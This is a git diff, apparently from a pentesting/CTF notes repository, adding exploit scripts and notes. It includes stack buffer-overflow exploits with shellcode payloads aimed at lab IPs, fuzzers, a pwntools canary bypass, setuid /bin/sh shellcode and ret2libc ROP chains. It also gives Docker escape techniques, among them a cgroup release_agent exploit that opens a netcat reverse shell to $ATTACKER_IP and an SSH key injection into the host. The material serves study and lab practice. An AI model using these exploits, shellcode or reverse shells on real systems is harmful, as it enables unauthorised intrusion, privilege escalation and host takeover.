b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f" +buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10" +buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7" +buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e" +buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90" +buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1" +buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83" +buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea" +buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b" +buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b" +buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93" +buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c" +buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab" +buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe" +buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8" +buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11" +buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea" + + +ip = "10.10.143.77" +port = 9999 + + +offset = 2012 +overflow = b"A" * offset +retn = b"\xdf\x14\x50\x62" #"BBBB" +padding = b"\x90" * 16 +payload = buf +postfix = b"" + + +buffer = overflow + retn + padding + payload + postfix + +try: + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((ip, port)) + s.recv(2000) + s.send(b"pwnbot") + s.recv(2000) + print("Sending evil buffer...") + s.send(buffer) + print("Done!") + s.close() +except socket.error: + print("Could not connect: "+socket.error) diff --git a/Exploits/Binaries/Scripts/buffer_overflow.py b/Exploits/Binaries/Scripts/buffer_overflow.py new file mode 100755 index 0000000..c8e7c21 --- /dev/null +++ b/Exploits/Binaries/Scripts/buffer_overflow.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python3 + +import socket + +ip = "10.10.122.155" +port = 31337 + +prefix = "" +offset = 146 +overflow = "A" * offset +# EIP return +#retn = "BBBB" +retn = "\xc3\x14\x04\x08" +padding = "\x90" * 16 +#padding = "" +#payload = "" +payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1" +payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4" +payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1" +payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44" +payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b" +payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5" +payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c" +payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb" +payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc" +payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b" +payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a" +payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66" +payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a" +payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34" +payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97" +payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a" +payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45" +payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93" +payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66" +payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29" +payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3" +payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb" +payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89" +payload += "\xef\xd9\x08\x3d\x0f\xc8"; + +#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" +postfix = "" +buffer = prefix + overflow + retn + padding + payload + postfix + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + s.connect((ip, port)) + print("[*] Sending buffer...") + s.send(bytes(buffer + "\r\n", "latin-1")) + print("Done!") +except: + print("Could not connect") diff --git a/Exploits/Binaries/Scripts/canary_bypass.py b/Exploits/Binaries/Scripts/canary_bypass.py new file mode 100644 index 0000000..9cc903a --- /dev/null +++ b/Exploits/Binaries/Scripts/canary_bypass.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python + +from pwn import * +from time import sleep + + +#elf = context.binary = ELF('./pwn107.pwn107') +#p = process() +p = remote('10.10.216.4', 9007) +sleep(1) +p.sendline(b'%13$p,%19$p') # No. on stack. 1st: canary, 2nd: pointer to main function +sleep(1) +addresses = (p.recv().split())[62].decode().split(',') +print(addresses) +# Payload: Buffer + canary content + bsp + return pointer filled with address of the hidden function +payload = b'A' * 24 + p64(int(addresses[0],16)) + b'B' * 8 + p64(int(addresses[1], 16) - 0x45) +p.sendline(payload) +sleep(1) +p.interactive() diff --git a/Exploits/Binaries/Scripts/fuzzer.py b/Exploits/Binaries/Scripts/fuzzer.py new file mode 100755 index 0000000..6bc6480 --- /dev/null +++ b/Exploits/Binaries/Scripts/fuzzer.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python +import sys, time, socket + +ip = "192.168.56.102" +port = 31337 +timeout = 5 +prefix = "" +counter = 100 + +string = prefix + "A" * counter +while True: + try: + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: + s.connect((ip, port)) + print ('[+] Sending buffer') + #s.recv(1024) + print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + s.send(bytes(string + '\r\n', "latin1")) + s.recv(1024) + except: + print ("[!] The program can't be reached") + sys.exit(0) + string += counter * 'A' + time.sleep(1) diff --git a/Exploits/Binaries/Scripts/fuzzer2.py b/Exploits/Binaries/Scripts/fuzzer2.py new file mode 100644 index 0000000..c46e581 --- /dev/null +++ b/Exploits/Binaries/Scripts/fuzzer2.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python2 +import sys,socket +import time + +address = '192.168.56.102' +port = 9999 +buffer = ['A'] +counter = 100 +while len(buffer) < 10: + buffer.append('A'*counter) + counter=counter+100 +try: + for string in buffer: + print '[+] Sending %s bytes...' % len(string) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connect=s.connect((address,port)) + s.send(string + '\r\n') + s.recv(1024) + print '[+] Done' +except: + print '[!] Unable to connect to the application. You may have crashed it.' + sys.exit(0) +finally: + s.close() diff --git a/Exploits/Binaries/Scripts/fuzzer_BO.py b/Exploits/Binaries/Scripts/fuzzer_BO.py new file mode 100755 index 0000000..b098066 --- /dev/null +++ b/Exploits/Binaries/Scripts/fuzzer_BO.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python3 + +import socket, time, sys + +ip = "10.10.161.147" +port = 9999 +timeout = 5 +prefix = "" + +string = prefix + "A" * 100 + +while True: + try: + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: + s.settimeout(timeout) + s.connect((ip, port)) + s.recv(1024) + s.recv(1024) + s.send("User" '\r\n') + #print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + s.send(bytes(string, "latin-1")) + s.recv(1024) + s.send(string + '\r\n') + #print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + print(f"fuzzing with {len(string)} bytes") + except: + #print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) + sys.exit(0) + string += 100 * "A" + time.sleep(1) + diff --git a/Exploits/Binaries/Scripts/pwn_fuzz.py b/Exploits/Binaries/Scripts/pwn_fuzz.py new file mode 100644 index 0000000..55c0c18 --- /dev/null +++ b/Exploits/Binaries/Scripts/pwn_fuzz.py @@ -0,0 +1,8 @@ +import pwn + +r = pwn.remote("10.10.156.228", 9999) +r.recvuntil(":") +r.send("User\r\n") +r.recvuntil(":") +r.send(b'A' * 2200) +r.recvuntil("message:") diff --git a/Exploits/Binaries/Shellcode.md b/Exploits/Binaries/Shellcode.md new file mode 100644 index 0000000..312ff13 --- /dev/null +++ b/Exploits/Binaries/Shellcode.md @@ -0,0 +1,107 @@ +## Shellcode + +* [linux syscalls](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) Are used to craft the shellcode in assembly language +* [asmtutor.com](https://asmtutor.com) to check the assembly + +## Staged and Unstaged Payloads + +* An unstaged payload is directly embedded in a binary and executes as is. This may be used to start malicious payload which does not need a remote connection or nearly none. +* A small stub of the staged payload is embedded in the binary and should load additional instructions from remote which build the final reverse shell. The downloaded part will only reside in memory. The downloaded shellcode can be changed + +## Writing Shellcode Manually + +* Executing the shellcode relies on syscalls of the system + +* A 32 bit version looks like this +```assembly +SECTION .data +msg db 'Hello World!', 0Ah + +SECTION .text +global _start + +_start: + + mov edx, 13 + mov ecx, msg + mov ebx, 1 + mov eax, 4 + int 80h + + mov ebx, 0 ; return 0 status on exit - 'No Errors' + mov eax, 1 ; invoke SYS_EXIT (kernel opcode 1) + int 80h +``` + +* A 64 bit version looks like this +```assembly +global _start + +section .text +_start: + jmp MESSAGE + +OUTPUT: + mov rax, 0x1 + mov rdi, 0x1 + pop rsi + + mov rdx, 0xd + syscall + + mov rax, 0x3c + mov rdi, 0x0 + syscall + +MESSAGE: + call OUTPUT + db "Hello, world!", 0dh, 0ah +``` + +### Compilation + +* Compile and link 32 bit +```sh +nasm -f elf helloworld.asm +ld -m elf_i386 helloworld.o -o helloworld +``` + +* Compile and link 64 bit +```sh +nasm -f elf64 helloworld.asm +ld helloworld.o -o helloworld +``` + +### Dump the binary + +* Dump the binary with `objdump -d helloworld` and take a look at the text section +* Dump the text section into a file via +```sh +objcopy -j .text -O binary helloworld helloworld.text +``` + +### Format the Shellcode + +* Format and test the code by dumping it into a c file +``` +xxd -i helloworld.text > helloworld.c +sed -i '1s/^/#include\n\n/' helloworld.c +echo -e "\n\t(*(void(*)())helloworld_text)();\n\treturn 0;\n}" >> helloworld.c +``` + +* Compile the c file with an exectuable stack +```sh +gcc -z execstack -g -o helloworld helloworld.c +``` + +## Automated Shellcode Generation + +* Automate the creation via msfvenom +* Staged payloads look like this +```sh +msfvenom -p linux/x64/meterpreter/reverse_tcp +``` +* Stageless payloads look like this +```sh +msfvenom -p linux/x64/meterpreter/reverse_tcp +``` diff --git a/Exploits/Binaries/amd64 Instructions.md b/Exploits/Binaries/amd64 Instructions.md new file mode 100644 index 0000000..9b37210 --- /dev/null +++ b/Exploits/Binaries/amd64 Instructions.md @@ -0,0 +1,77 @@ +# amd64 instructions + +* `;` starts a comment + +## Values +* __Immediate__, numbers +* __register__, existing registers +* __memory__, memory addresses + +## Move +* `MOV`, from source to destination +* `LEA`, loads memory address and stores it in the destination. Address can have an offset. Does not dereference `[var]` or `[var+x]` +* `PUSH` & `POP`, put & delete registers to/from stack. + +## Arithmetic +* `INC`, increment +* `DEC`, decrement +* `ADD` +* `SUB`, substracts source from dest and stores in dest +* `MUL` & `IMUL`, result may be stored in upper and lower halfs (rdx:rax) +* `DIV` & `IDIV`, rax is divided by rbx and may be stored in two halfs as well + +## Conditionals +* `RET`, return value to the caller +* `CMP`, compare two values and sets flag. Next instruction is a jump condition to a line number. Works as follows + * `JE`, `JEZ`, `JLE` ... followed by linenumber +* `NOP`, `\x90` +* `CALL` a function + +## Address Handling +* `[var]`, memory address of var. + * If var contains an address then after `mov [var], 42` var points to the value 42. `[` dereference. + +## Zero Handling in Registers +* Move to `eax` will result in zeroing the upper 32 bit of an `rax` register, move to `ax`, `ah`, `al` will not. +* `MOVZX` zeros anything but the value moved to the register inside of it. + +## Jumps +* For signed value comparison + * `JL/JNGE` (SF <> OF) ; Jump if less/not greater or equal + * `JGE/JNL` (SF = OF) ; Jump if greater or equal/not less + * `JLE/JNG` (ZF = 1 or SF <> OF); Jump if less or equal/not greater + * `JG/JNLE` (ZF = 0 and SF = OF); Jump if greater/not less or equal + +* For unsigned value comparison + * `JB/JNAE` (CF = 1) ; Jump if below/not above or equal + * `JAE/JNB` (CF = 0) ; Jump if above or equal/not below + * `JBE/JNA` (CF = 1 or ZF = 1) ; Jump if below or equal/not above + * `JA/JNBE` (CF = 0 and ZF = 0); Jump if above/not below or equal + +## Flags +* `eflags` 32bit +* `rflags` 64bit + +### Status +* __Zero Flag__ (ZF), 1 if the result of the comparison is equal. +* __Carry Flag__ (CF), a 1 is stored if a carry is needed after a calculation. +* __Overflow Flag__ (OF), register overflow is 1 +* __Sign Flag__ (SF), 1 if result is negative. +* __Adjust/Auxiliary Flag__ (AF), carry flag for BCD. +* __Parity Flag__ (PF), 1 if the last 8 bits are even. +* __Trap Flag__ (TF) + +## Calling Conventions + +## cdecl + +## fastcall +* First four are passed __left to right__ +* int -> RCX, RDX, R8, R9 +* float -> XMM0, XMM1, XMM2, XMM3 +* Rest is __right to left__ +* Basepointer is saved by the caller +* Return values is passes via `rax` or `xmm0` +* Caller allocates space for at least four values, so 32 bytes are reserved. `$rsp to $rsp+0x18` +* Volatile registers are `rax, rcx, r8, r9, r10, r11, xmm0, xmm1, xmm2, xmm3, xmm4, xmm5`. These are destroyed after function call. +* Nonvolatile registers are `rbx, rbp, rdi, rsi, rsp, r12, r13, r14, r15, xmm6-15` ares saved and restored after function call. diff --git a/Exploits/Binaries/amd64.md b/Exploits/Binaries/amd64.md new file mode 100644 index 0000000..de18ef8 --- /dev/null +++ b/Exploits/Binaries/amd64.md @@ -0,0 +1,56 @@ +# amd64 + +* `rax` return value, caller saved. +* `rbx` base register (used for mem basepointer) +* `rcx` counter register +* `r10`, `r11` are caller saved. +* `rbx`, `r12`, `r13`, `r14` are callee saved +* `rdx` data register +* `rbp` is also callee saved(and can be optionally used as a frame pointer) +* `rsp` is callee saved +* `rip` next instruction pointer + +## Function argument registers +* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved. +* Further function args are stored inside its stack frame. + + +## Overwriting Variables and Padding +* Overwrite an atomic variable behind a buffer +```C +int main ( int argc, char ** argv ) { + int var = 0 + char buffer[12]; + + gets(buffer); + [...] +} +``` +* Stack layout +``` +Bottom ++------------------+ +| Saved registers | ++------------------+ +| int var | ++------------------+ +| char buffer [11] | +| ... | +| ... | +| ... | +| char buffer [0] | ++------------------+ +| char ** argv | ++------------------+ +| char argc | ++------------------+ +Top +``` + +* Watch out! I.e., a 12 byte array is padded to system memory allocation size. +``` ++-------------+----+ +|12 byte array| 4b | ++-------------+----+ +0 12 16 byte +``` diff --git a/Exploits/Binaries/pwntools Specifics.md b/Exploits/Binaries/pwntools Specifics.md new file mode 100644 index 0000000..14bafbb --- /dev/null +++ b/Exploits/Binaries/pwntools Specifics.md @@ -0,0 +1,15 @@ +# pwntools + +## Memory Addresses of ELF Binary +* Find address of function and use it on $eip +```python +p = process() +elf = ELF() +__function = elf.symbol. +payload = fit({ + 42: __function # Length measured via cyclic +}) +p.sendline() +proc.interactive() +``` + diff --git a/Exploits/Binaries/radare2.md b/Exploits/Binaries/radare2.md new file mode 100644 index 0000000..54bcba1 --- /dev/null +++ b/Exploits/Binaries/radare2.md @@ -0,0 +1,99 @@ +# Radare2 + +## Usage +### Debug +```sh +r2 -d +``` +* Analyze +```sh +aaa +``` +* Show all info +```sh +ia +``` +* Search for strings +```sh +izz +``` +* Main address +```sh +iM +``` +* Entrypoint +```sh +ie +``` +* Current memory address +```sh +s +``` +* Show address of function or register, respectively +```sh +s +sr +``` +* Show main +```sh +pdf @main +``` +* Show main and follwing functions +```sh +pd @main +``` +* Breakpoint +```sh +db 0xdeadbeef +``` +* Show all breakpoints +```sh +dbi +``` +* Show rbp-0x4 +```sh +px @rbp-0x4 +``` +* Continue +```sh +dc +``` +* Step +```sh +ds +``` +* Show registers +```sh +dr +``` +* Restart +```sh +ood +``` +### Visual Mode +* Enter visual mode via `VV` +* Enter normal mode inside visual mode via `:` +* Add comment via `;` + +### Write Mode +* Enter write mode via `w` +* Write cache list via `wc` +* Alter/modify opcode at current seek via `wA` +* Use as follows +```sh +s +wx +dc +``` + +## AT&T Instructions +* leaq src, dst: this instruction sets dst to the address denoted by the expression in src +* addq src, dst: dst = dst + src +* subq src, dst: dst = dst - src +* imulq src, dst: dst = dst * src +* salq src, dst: dst = dst << src +* sarq src, dst: dst = dst >> src +* xorq src, dst: dst = dst XOR src +* andq src, dst: dst = dst & src +* orq src, dst: dst = dst | src + diff --git a/Exploits/Binaries/ret2libc.md b/Exploits/Binaries/ret2libc.md new file mode 100644 index 0000000..1de7011 --- /dev/null +++ b/Exploits/Binaries/ret2libc.md @@ -0,0 +1,130 @@ +# Ret2libc + +* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc) + +* Check binary via + * `checksec`, PIE shows start address, RELRO shows permissions of r/w to got + * `file` +* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space` + * Off = 0 + * Partial = 1 + * Full = 2 +* `got` contains dynamically loaded functions +* `plt` contains used loaded dynamical functions + +## Finding something to execute +* Interesting stuff to call from inside libc + * `/bin/sh` + * `system` + +## libc -- Finding Offsets + +* Find libc address at runtime via gbd +```sh +info sharedlibrary +``` + +### Manually +* On target find `sh` address inside libc +```sh +strings -a -t x /lib32/libc.so.6 | grep /bin/sh +``` +* Sub from `system` address from inside libc +```sh +readelf -s /lib32/libc.so.6 | grep system +``` + +### Measure the Buffer +* With gef + * `pattern create` + * `run` + * Use pattern + * `pattern search $` + +## ROP -- Creating a Chain + +* Creating a ROP chain to execute the `/bin/sh` with parameters +* Check + * Architecture + * Calling convention + +### Manually + +```sh +ROPgadget --binary | grep rdi +``` +* Find `ret`s, to put in front of rdi +```sh +objdump -d | grep ret +``` + +## Automated + +* [xct's ropstar](https://github.com/xct/ropstar.git) + +## Example without ASLR +```python +from pwn import * + +p = process('') + +cbase = 0x +sys = cbase + +sh = cbase + +rop_rdi = +rop_ret = + +payload = b'A' * +payload += b'B' * 8 +payload += p64(rop_ret) +payload += p64(rop_rdi) +payload += p64(sh) +payload += p64(system) +payload += p64(0x0) # end payload + +p.recv() +p.sendline(payload) +p.interactive() +``` + +## Example with ASLR +* Create context +```python +#!/usr/bin/env python3 + +from pwn import * + +context.binary = binary = '' +elf = ELF(binary) +rop = ROP(elf) +libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') +p = process() + +# ROP I, needed when ASL is enabled +payload = b'A' * 18 +payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0]) +payload += p64(elf.got.gets) +payload += p64(elf.plt.puts) +payload += p64(elf.symbols.main) + +p.recvline() +p.sendline(payload) +p.recvline() +leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement +p.recvline() + +log.info(f"gets: {hex(leak)}") +libc.address = leak - libc.symbols.gets +log.info(f"libc address: {hex(libc.address)}") # start address should be aligned + +# ROP II +payload = b'A' * 18 +payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0]) +payload += p64(next(libc.search(b'/bin/sh'))) +payload += p64(rop.find_gadget(['ret'])[0]) +payload += p64(libc.symbols.system) + +p.sendline(payload) +p.recvline() +p.interactive() +``` diff --git a/Exploits/Binaries/shellcodes/setreuid_shell.as b/Exploits/Binaries/shellcodes/setreuid_shell.as new file mode 100644 index 0000000..ef1c822 --- /dev/null +++ b/Exploits/Binaries/shellcodes/setreuid_shell.as @@ -0,0 +1,23 @@ +xor rdi,rdi <------ set the rdi to 0 +xor rax,rax +xor rsi, rsi <------ set the rsi to 0 +mov si, 1002 <------ put the value 1002 in the lower bits of the rsi +mov di, 1002 <------ put the value 1002 in the lower bits of the rdi +mov al,0x71 <------ put the setruid function in the al register +syscall <------ call the function. +xor rdx,rdx +movabs rbx,0x68732f6e69622fff +shr rbx,0x8 +push rbx +mov rdi,rsp +xor rax,rax +push rax +push rdi +mov rsi,rsp +mov al,0x3b +syscall +push 0x1 +pop rdi +push 0x3c +pop rax +syscall diff --git a/Exploits/Binaries/shellcodes/setuid_shell.as b/Exploits/Binaries/shellcodes/setuid_shell.as new file mode 100644 index 0000000..94cae5a --- /dev/null +++ b/Exploits/Binaries/shellcodes/setuid_shell.as @@ -0,0 +1,38 @@ +//setuid(0) + execve(/bin/sh) - just 4 fun. +//xi4oyu [at] 80sec.com + +/* +main(){ + __asm( "xorq %rdi,%rdi\n\t" + "mov $0x69,%al\n\t" + "syscall \n\t" + "xorq %rdx, %rdx \n\t" + "movq $0x68732f6e69622fff,%rbx; \n\t" + "shr $0x8, %rbx; \n\t" + "push %rbx; \n\t" + "movq %rsp,%rdi; \n\t" + "xorq %rax,%rax; \n\t" + "pushq %rax; \n\t" + "pushq %rdi; \n\t" + "movq %rsp,%rsi; \n\t" + "mov $0x3b,%al; \n\t" + "syscall ; \n\t" + "pushq $0x1 ; \n\t" + "pop %rdi ; \n\t" + "pushq $0x3c ; \n\t" + "pop %rax ; \n\t" + "syscall ; \n\t" + ); +} +*/ +main() { + char shellcode[] = + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" + "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" + "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" + "\x58\x0f\x05"; + (*(void (*)()) shellcode)(); +} + +//2009-05-14 +//evil.xi4oyu diff --git a/Exploits/CPUs/Meltdown.md b/Exploits/CPUs/Meltdown.md new file mode 100644 index 0000000..931630c --- /dev/null +++ b/Exploits/CPUs/Meltdown.md @@ -0,0 +1,26 @@ +# Meltdown + +* [PoC from IAIK](https://github.com/IAIK/meltdown.git) +![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown") + +* Each page table entries has the following flag values + * SUP (user or kernel mode) + * READ + * WRITE + +* Flags are checked by the MMU + +* Pipelined steps of an instruction are the following + * Fetch + * Decode + * Execute + * Memory access + * Register write back + +* A pipeline can execute one of each steps concurrently every clock cycle. +* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls. +* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline. + * If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end. + +* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown. + diff --git a/Exploits/Containers/Docker.md b/Exploits/Containers/Docker.md new file mode 100644 index 0000000..d2d05c5 --- /dev/null +++ b/Exploits/Containers/Docker.md @@ -0,0 +1,185 @@ +# Docker Vulnerabilities + +* [Container enumeration](https://github.com/stealthcopter/deepce) + +## Abusing Registry +* [Registry Doc](https://docs.docker.com/registry/spec/api/) +* Registry is a json API endpoint +* Private registry added in `/etc/docker/daemon.json` +* Can be found by nmap as a service + +### Enumeration +* General query +```sh +curl http://test.com:5000/v2/_catalog` +``` +* List tags +```sh +curl http://test.com:5000/v2///tags/list +``` +* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords. +```sh +curl http://test.com:5000/v2///manifest/ +``` + +## Reversing Docker Images +* [Dive](https://github.com/wagoodman/dive) +```sh +dive +``` + +## Uploading Images to Registry +* Ever image has a `latest` tag +* Upload modified docker image as `latest` +* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining) + +## RCE via Exposed Docker Daemon +* Users inside the `docker` group may open tcp socket through docker +* `nmap -sV -p- -vv` to find exposed tcp sockets via docker +* Confirming via `curl http://test.com:2375/version` on open docker port +* Execute commands on socket + ```sh + docker -H tcp://test.com:2375 ps + docker -H tcp://test.com:2375 exec + docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh + ``` + +* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease) + +## Escape Container via Exposed Docker Daemon +* Looking for exposed docker sockets +```sh +find / -name "*sock" +groups +``` + +* Mount the host volume and chroot to it, need alpine image. +```sh +docker images +docker run -v /:/mnt --rm -it alpine chroot /mnt sh +``` +or +```sh +docker run -v /:/host --rm -it chroot /host/ bash +``` + +## Shared Namespaces +* Namespaces +* Cgroups +* OverlayFS + +* Requires root inside the container + +* Execute command +```sh +nsenter --target 1 --mount sh +``` + +## Misconfiguration +* Privileged container connect to the host directly, not through the docker engine +* Execution of bins on the host from libs inside the container is possible +```sh +capsh --print +``` +* `man capabilities` + +* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.) + +* Exploit and get a reverse shell to the host via +```sh +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/exploit" > /tmp/cgrp/release_agent +echo '#!/bin/sh' > /exploit +echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/tmp/f" >> /exploit +chmod a+x /exploit +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +``` +* The file may appear outside the container on the host system +## Check fdisk + +* `fdisk -l` and `lsblk`, host bulk device may be exposed +* Mount the device +```sh +mkdir /mnt/hostdev +mount /dev/ /mnt/hostdev +``` +* Check `/dev` as well !!! and mount device + +## Creating a Container from inside another container + +* Needs root inside a container +* Upload [static curl](https://github.com/moparisthebest/static-curl) +* Check available images and containers +```sh +curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json +curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json +``` +* Inside the container as root +```sh +curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":":latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo >> /var/tmp/root/.ssh/authorized_keys"]}' +``` +* Return value is the ID +* Start a container +```sh +curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers//start +``` +* Login in to the host via ssh 